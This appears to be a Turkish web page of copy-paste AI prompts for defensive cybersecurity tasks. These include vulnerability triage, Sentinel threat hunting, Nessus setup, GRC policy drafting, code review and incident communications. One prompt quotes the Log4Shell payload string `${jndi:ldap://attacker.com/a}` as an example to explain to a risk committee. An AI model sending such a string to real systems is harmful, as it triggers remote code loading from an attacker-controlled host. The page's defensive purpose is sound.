Herhangi birini doğrudan ChatGPT, Claude ya da Gemini’ye kopyalayın, sonra köşeli parantezleri kendi bilgilerinizle değiştirin.
32 kopyala-yapıştır prompt
1Güvenlik Açığı Önceliklendirme için Yapay Zeka İstemcisi
Kıdemli bir siber güvenlik analistisiniz. Bir üretim web sunucusunun (varlık kritikliği: yüksek) Nessus taramasından elde edilen aşağıdaki güvenlik açığı verileri göz önüne alındığında, acil iyileştirme için en önemli 3 güvenlik açığını önceliklendirin. Her biri için, genel CVSS puanının ötesine geçerek bağlamdaki belirli riski açıklayan 1 cümlelik bir gerekçe sunun. **Nessus Verileri:** 1. CVE-2023-34048 (CVSS 9.8): VMware vCenter Server out-of-bounds write vulnerability. 2. CVE-2021-44228 (Log4Shell, CVSS 10.0): Apache Log4j remote code execution. The server is running a legacy Java application. 3. CVE-2024-21893 (CVSS 8.8): Ivanti Connect Secure SSRF vulnerability. 4. Unpatched Apache Struts (No specific CVE given, but known to be vulnerable to RCE). 5. TLS 1.0 Enabled (CVSS 2.6).
Bir GRC analisti olarak hareket edin. NIST AI RMF'nin 'Yönet' işlevi için bir politika taslağı hazırlamam gerekiyor. Kuruluşumuz EDR için Microsoft Defender for Endpoint'i, otomatik güvenlik doğrulaması için Pentera'yı ve yönetişim için Credo AI'yı kullanıyor. Bu araçlar tarafından belirlenen risklerin nasıl yönetileceğini tanımlayan bir politika bölümü taslağı hazırlayın. Belirtin: 1. Defender'da otomatik yanıt için ciddiyet eşikleri (örneğin, otomatik cihaz izolasyonunu ne tetikler). 2. Pentera tarafından bulunan 'Kritik' ve 'Yüksek' güvenlik açıklarının giderilmesi için SLA. 3. Credo AI'da belirlenen model önyargısı sorunlarını kaydetme ve izleme süreci, sahiplik ve inceleme sıklığı dahil.
Kıdemli bir güvenlik analisti olarak hareket edin. Bir tarayıcıdan bir güvenlik açığı raporum var. Bulguları aşağıdaki bağlama göre önceliklendirin: - Etkilenen varlık, 'kritik' olarak etiketlenmiş, Linux çalıştıran, dışa dönük bir web sunucusudur. - Uygulama, kredi kartı verilerini işleyen bir e-ticaret platformudur. - Birincil tehditlerimiz fidye yazılımı grupları ve fırsatçı finansal saldırganlardır. İşte güvenlik açığı verileri (CSV formatında): [[CVE-ID]], [[CVSS Puanı]], [[Güvenlik Açığı Adı]], [[Varlık IP'si]] CVE-2026-XXXX, 9.8, "Apache Struts'ta Uzaktan Kod Yürütme", 1.2.3.4 CVE-2026-YYYY, 7.5, "Web Çerçevesinde Siteler Arası Komut Dosyası Çalıştırma", 1.2.3.4 Önce hangi CVE'nin ele alınması gerektiğine dair önceliklendirilmiş bir liste sağlayın ve gerekçenizi bir markdown tablosunda açıklayın.
Bir SOC analisti olarak hareket edin. Microsoft Sentinel kullanarak Windows uç noktalarında kalıcılık belirtileri aramam gerekiyor. Aradığım teknik, yeni bir hizmetin oluşturulması ve kısa bir süre içinde başlatılmasıdır. Aşağıdaki Kusto Sorgu Dili (KQL) sorgusunu oluşturun: 1. Windows Olay Kimliği 4697'yi (sisteme bir hizmet yüklendi) arar. 2. Windows Olay Kimliği 7036'yı (bir hizmet çalışma durumuna girdi) arar. 3. Bu olayları ServiceName ve ana bilgisayar adına göre birleştirir. 4. Hizmetin yüklendikten sonra 5 dakika içinde başlatıldığı örnekleri filtreler. 5. Ana bilgisayar adını, hizmet adını ve onu yükleyen kullanıcıyı listeler.
. 1. In simple terms, what does this malware signature typically indicate? 2. What is the common behavior of this malware family? (e.g., ransomware, infostealer, RAT) 3. What are the 3-5 immediate next steps a junior analyst should take to investigate the host
, generate three distinct threat hunting hypotheses. For each hypothesis, specify: 1. The Hypothesis itself. 2. The Data Sources required (e.g., EDR logs, DNS logs, proxy logs). 3. A sample query (in pseudo-query language) to test the hypothesis. Example format: **Hypothesis 1:** The threat actor is using scheduled tasks to establish persistence. **Data Source:** EDR process creation logs, Windows Event Logs (ID 4698). **Query:**
Act as a security consultant. I need to configure a Tenable Nessus scan for a new segment of our network that contains `[[SERVER_TYPES]]` (e.g., web servers, database servers, domain controllers). Recommend a Nessus scan policy configuration. Your recommendation should cover: - **Scan Template:** Which Nessus template to start with (e.g., Basic Network Scan, Credentialed Patch Audit). - **Credentials:** Why a credentialed scan is necessary. - **Plugins:** Which plugin families are most important to enable for these server types. - **Frequency:** A recommended scan frequency (e.g., weekly, monthly). Provide the output as a set of clear recommendations with brief justifications for each.
, but we have determined it is a false positive. I need to write a formal justification for our records. Draft a paragraph that explains *why* this finding is a false positive. Use the following information: - **Finding:** The scanner identified
You are a vulnerability analyst reporting to the CISO. I have a list of 5 critical vulnerabilities that were discovered this week. Create a high-level summary table for a management report. The table should have the following columns: - `Vulnerability (CVE)` - `Systems Affected (Count)` - `Recommended Action` - `Assigned Team` - `Remediation ETA` Populate the table using this data: - **CVE-2026-1001:** Affects 15 web servers. Action: Apply vendor patch. Team: Web Ops. ETA: 7 days. - **CVE-2026-1002:** Affects 50 workstations. Action: Deploy updated software via SCCM. Team: Desktop Engineering. ETA: 14 days. - **CVE-2026-1003:** Affects 2 domain controllers. Action: Apply registry key change. Team: Infrastructure. ETA: 3 days. - **CVE-2026-1004:** Affects 10 Linux servers. Action: Update kernel. Team: Linux Ops. ETA: 10 days. - **CVE-2026-1005:** Affects 1 custom application. Action: Developer code fix. Team: AppDev. ETA: 30 days.
code snippet for potential OWASP Top 10 vulnerabilities, specifically looking for: - Injection flaws (SQL, Command) - Broken Authentication - Sensitive Data Exposure - Insecure Deserialization For each issue you find, provide: 1. The vulnerable line number. 2. A brief explanation of the vulnerability. 3. A code example showing how to fix it. If no issues are found, state that. Code Snippet:
Our Snyk scan has found a critical vulnerability (`[[CVE_ID]]`) in the open-source library `[[LIBRARY_NAME]]`, version `[[VERSION_NUMBER]]`. Explain this vulnerability to a development team. Your explanation should include: 1. What the vulnerability allows an attacker to do (e.g., remote code execution, denial of service). 2. How the vulnerability is triggered. 3. What the recommended action is (e.g., "Upgrade to version X.Y.Z"). Keep the explanation concise and focused on what the developers need to know to fix it.
Act as a principal security engineer. Write a secure coding guideline for our development team on the topic of "Input Validation". The guideline should be a markdown document that includes: - A brief, simple explanation of why input validation is important. - A "Do" section with 2-3 best practices (e.g., use allow-lists, validate on the server-side). - A "Don't" section with 2-3 common mistakes (e.g., rely only on client-side validation, use block-lists). - A short, clear code example in `[[LANGUAGE]]` showing a "bad" vs. "good" implementation.
function that is vulnerable to SQL injection. Refactor the code to use parameterized queries (prepared statements) to prevent this vulnerability. Show the "before" and "after" code blocks. Vulnerable Code:
Act as a GRC analyst. I need to draft a new corporate security policy on "Acceptable Use of AI Tools". The policy should be structured with the following sections: 1. **Purpose:** Why this policy exists. 2. **Scope:** Who this policy applies to. 3. **Policy Statements:** A list of rules, including: - Prohibition on using public AI tools with sensitive company or customer data. - Requirement to use only company-approved AI platforms. - Guidelines on verifying the accuracy of AI-generated content. - A statement on data ownership and confidentiality. 4. **Enforcement:** The consequences of violating the policy. Generate a professional draft of this policy.
I am preparing for an audit. I need to map our existing ISO 27001 controls to the SOC 2 Trust Services Criteria. For the following ISO 27001 control, identify the corresponding SOC 2 criteria it helps satisfy. **ISO 27001 Control:** `[[ISO_CONTROL_DESCRIPTION]]` (e.g., "A.9.4.1: Information access restriction") Provide the corresponding SOC 2 TSC and a brief one-sentence explanation of the mapping. Example Output: **SOC 2 TSC:** CC6.1 - Logical Access Security **Explanation:** This control directly supports the SOC 2 requirement to restrict logical access to information and systems based on roles and responsibilities.
I am conducting a risk assessment on our new `[[CLOUD_SERVICE_NAME]]` deployment. Generate a risk scenario related to "Inadequate Access Controls". The scenario should be structured with these fields: - **Risk Scenario:** A brief, one-sentence description of the event. - **Threat Actor:** Who might cause this (e.g., Malicious Insider, External Attacker). - **Vulnerability:** The weakness that allows it (e.g., Overly permissive IAM roles). - **Impact:** The business outcome if it occurs (e.g., Data breach, service disruption). - **Existing Controls:** What we currently have in place (e.g., MFA, basic logging). Fill out this structure for the "Inadequate Access Controls" risk.
24Translate Technical Findings for a Risk Committee
I need to explain the risk of an unpatched Log4j vulnerability (CVE-2021-44228) to a non-technical risk committee. Translate the following technical description into a simple, analogy-based business risk statement. Avoid jargon like RCE, JNDI, and LDAP. **Technical Description:** "The Log4j vulnerability allows for unauthenticated remote code execution (RCE) by logging a specially crafted string. An attacker can send a string like `${jndi:ldap://attacker.com/a}` which causes the server to connect back to the attacker's system and execute a malicious payload." Focus on what it means for the business (e.g., "It's like leaving a back door unlocked...").
You are a senior incident response manager. Our team has just resolved a `[[INCIDENT_TYPE]]` incident. Create a detailed outline for a Post-Incident Review (PIR) document. The outline should include all major sections and sub-bullets for the key topics to cover in each. Include sections for: 1. Executive Summary 2. Incident Timeline (Key Events) 3. Root Cause Analysis (What failed?) 4. Impact Assessment (Business, Technical, Financial) 5. Lessons Learned (What went well? What went poorly?) 6. Action Items (A table with columns for Action, Owner, and Due Date)
28Formulate Questions for a Forensic Investigation
We are beginning a digital forensics investigation on a compromised host (`[[HOSTNAME]]`) related to a data exfiltration incident. Act as a lead forensic investigator. Generate a list of the top 10 key questions our investigation needs to answer. The questions should be focused on establishing the full scope and timeline of the breach. Examples: - How did the attacker gain initial access to the host? - What tools did the attacker use on the host? - What data was accessed or exfiltrated from the host?
You are the head of corporate communications, working with the security team. We need to send a brief internal update to all employees about a recent security incident that has been resolved. The incident was a `[[INCIDENT_TYPE]]` that caused `[[IMPACT]]`. Draft a short, reassuring, and non-technical message for all staff. The message should: - Acknowledge that a disruption occurred. - Confirm that the issue is now resolved. - Thank the security team. - Remind employees to remain vigilant and report suspicious activity. Do not include technical details about the incident.
Act as a senior application security engineer. Review the following Python code snippet for potential security vulnerabilities, specifically looking for injection flaws (SQLi, Command Injection), insecure deserialization, and improper error handling. For each finding, provide the CWE number, explain the risk in the context of this code, and suggest a specific, secure code replacement. [[PASTE CODE SNIPPET HERE]]
Act as a GRC analyst specializing in AI governance. I have the following security control from our System Security Plan: "All cloud database instances are configured with encryption at-rest using AES-256." Map this control to the relevant subcategories within the NIST AI Risk Management Framework (AI RMF 1.0) Core Functions (Govern, Map, Measure, Manage). For each mapping, explain the rationale.
Dört adım, yaklaşık bir dakika. Yapıyı prompt verir, ayrıntıları siz.
1
Promptu seçin
Buradaki her prompt belirli bir iş için yazıldı — “uzman gibi davran” türü genel bir şablon değil. Başlıkları tarayın ve önünüzdeki işe uyanı alın.
2
Kopyalayıp yapıştırın
Kopyala’ya basın, tamamını ChatGPT, Claude, Gemini ya da zaten ödediğiniz asistana yapıştırın. Buradaki hiçbir şey tek bir modele bağlı değil.
3
Köşeli parantezleri doldurun
Göndermeden önce her [Köşeli parantezli alanı] kendi bilgilerinizle değiştirin. Kalite oradan gelir: yapıyı prompt verir, ayrıntıları siz.
4
Kaynak rehbere bakın
Her promptun altındaki “Kaynak” bağlantısı tam makaleyi açar: prompt neden böyle kurulmuş, neye karşı test edilmiş ve hangi araçlarla iyi çalışıyor.
Sık sorulanlar
Bu promptlardan birini gerçek bir işe yapıştırmadan önce akla gelen sorular.
Bu promptlar ücretsiz kullanılabilir mi?
Evet. Bu sayfadaki 32 promptun tamamı ChatGPT, Claude ve Gemini dahil herhangi bir yapay zekâ asistanıyla serbestçe kopyalanıp kullanılabilir. Yalnızca bu araçlardan birinde hesabınız olması yeterli.
siber güvenlik için bu promptları nasıl kullanırım?
Kopyala düğmesiyle prompt metnini alın, seçtiğiniz yapay zekâ asistanına yapıştırın ve göndermeden önce [Şehriniz] ya da [Şirket adı] gibi köşeli parantezli alanları kendi bilgilerinizle değiştirin.
Bu promptlar nereden geliyor?
Her prompt, test edilmiş bir Zekai rehberinden alındı. Her promptun altındaki “Kaynak” bağlantısı, mantığını ve nasıl test edildiğini anlatan tam makaleye gider.
Bu promptları değiştirebilir miyim?
Kesinlikle. Her birini başlangıç yapısı olarak görün: talimatları sıkılaştırın, kendi kısıtlarınızı ekleyin ve en iyi çıktıyı veren sürümü saklayın. Köşeli parantezler, her seferinde değişmesi gereken yerleri işaretler.
Diğer mesleklerin prompt kütüphaneleri
Aynı biçim, başka iş — siber güvenlik alanına en yakın olanlardan başlayarak.